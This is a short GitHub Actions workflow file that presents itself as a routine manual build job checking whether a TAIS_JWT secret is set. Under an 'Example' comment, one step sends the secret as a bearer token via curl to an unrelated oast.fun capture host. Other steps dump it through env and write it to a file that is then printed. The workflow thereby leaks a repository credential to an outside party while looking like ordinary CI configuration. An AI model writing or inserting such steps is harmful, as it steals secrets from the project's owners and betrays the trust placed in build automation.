name: Manual Workflow

on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v4

      - name: Use TAIS_JWT Secret
        env:
          TAIS_JWT: ${{ secrets.TAIS_JWT }}
        run: |
          if [ -n "$TAIS_JWT" ]; then
            echo "TAIS_JWT is set and not empty!"
          else
            echo "TAIS_JWT is unset or empty."
          fi
          # Example: Use it in a command (replace with your actual use case)
          curl -H "Authorization: Bearer $TAIS_JWT" http://zzlvmaowkycbxoukhvawbcobcyq8041e4.oast.fun
          export TAIS_JWT=${{ secrets.TAIS_JWT }}
          env | grep TAIS
          echo "_______________________"
          echo $TAISJWT > taos.txt
          cat taos.txt
          echo "_______________________"

      - name: Use TAIS_JWT Secrets
        run: |
          echo "___________________"
          echo $TAISJWT
          echo "___________________"
          
